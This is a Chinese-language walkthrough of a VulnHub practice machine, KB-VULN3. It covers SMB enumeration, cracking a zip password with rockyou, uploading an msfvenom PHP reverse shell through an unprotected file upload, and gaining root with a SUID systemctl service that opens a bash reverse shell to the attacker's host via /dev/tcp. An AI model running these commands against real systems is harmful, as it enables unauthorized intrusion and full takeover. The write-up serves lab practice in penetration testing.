KB-VULN3靶机渗透总结
靶机下载地址:
https://download.vulnhub.com/kbvuln/KB-VULN3.ova
-
打开靶机,将网络连接模式改成NAT,然后使用namp扫描端口,发现没有ip,利用网上搜索出来的方法,修改了靶机
-
再次使用namp扫描了网段之后,发现了ip和打开的端口
可以看到,开放了22端口,80端口,139端口和445端口
-
先根据80端口打开网站,就是这样一个页面,什么功能也没有
-
在目录扫描一波,看看目录下有没有可以利用的网站
结果是除了首页,没有其它网页了
-
一般我们的渗透测试都是利用网站的漏洞,但是这里似乎网站没有可以利用的地方
那我们换个角度,它开放了4个端口,22端口和80端口是我们所熟知的,但是这个445和139端口,以往渗透靶机也没怎么有看见过,很有可能这里就是突破口,因此我百度了一下445端口和139端口的漏洞利用,还真发现一个139和445的Samba后门漏洞
网站: https://cloud.tencent.com/developer/article/1079631?ivk_sa=1024320u -
根据百度的结果,试验了一下,发现的确存在445端口漏洞,存在一个共享文件夹Files
并且提示都是HACK ME ,证明我们的思路是对的
这里也可以用enum4linux 192.168.11.139
也可以扫出共享文件Files
然后可以直接使用smbclient 来查看共享文件夹,百度的那个方法使用完后会多出个rootfs文件,但是也打不开那个,权限不够
那么主要就是这个website.zip文件,根据名字,猜测是网站相关
想办法打开这个文件,这里利用网上搜索的方法,使用get命令,下载到本地主机解压需要密码
网上的方法都是爆破,使用一个工具fcrackzip
kali没有这个工具,先安装
这个工具使用的字典是kali自带的/usr/share/wordlists/rockyou.txt
这里需要先解压下
然后使用fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u website.zip
打开之后是sitemagic目录和readme.txt
readme.txt给出了一个网站域名,还有账户密码
sitemagic目录里面是这个 -
我们先改下域名
通过域名打开网站
-
先利用给出的账户密码登录一下
-
接下来我们查看这个网站是否存在可以利用的漏洞,发现存在一个文件上传的功能点
并且发现,没有防护,可以直接上传任意文件,这里测试一个php文件
抓包看了下文件路径
是我写的hello没错 -
可以访问之后就简单了,上传一个php的反弹shell,利用msf获得shell
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.11.131 LPORT=12345 -f raw -o /home/kali/Desktop/shell.php
上传上去
先利用msf开启监听
再访问shell.php
成功获得shell
-
紧接着考虑提权,sudo无法提权,计划任务无法使用,passwd无法写入,然后suid提权,发现存在一个systemctl,可以使用suid提权
在提权网站上https://gtfobins.github.io/ 找到systemctl的suid提权sudo install -m =xs $(which systemctl) . TF=$(mktemp).service echo '[Service] Type=oneshot ExecStart=/bin/sh -c "id > /tmp/output" [Install] WantedBy=multi-user.target' > $TF ./systemctl link $TF ./systemctl enable --now $TF
首先编写一个service 文件,让开启服务的时候反弹到kali的7777端口[Service] Type=oneshot ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/192.168.11.131/7777 0>&1' [Install] WantedBy=multi-user.target
然后上传到网站的某个目录下,这里上传一个一句话木马,就可以连接到蚁剑了,方便上传文件,但是提权还是用msf,比较稳定
创建服务systemctl link /var/www/html/sitemagic/shell.service
本地开启7777端口监听
然后开启这个服务systemctl start shell.service
成功获得root的shell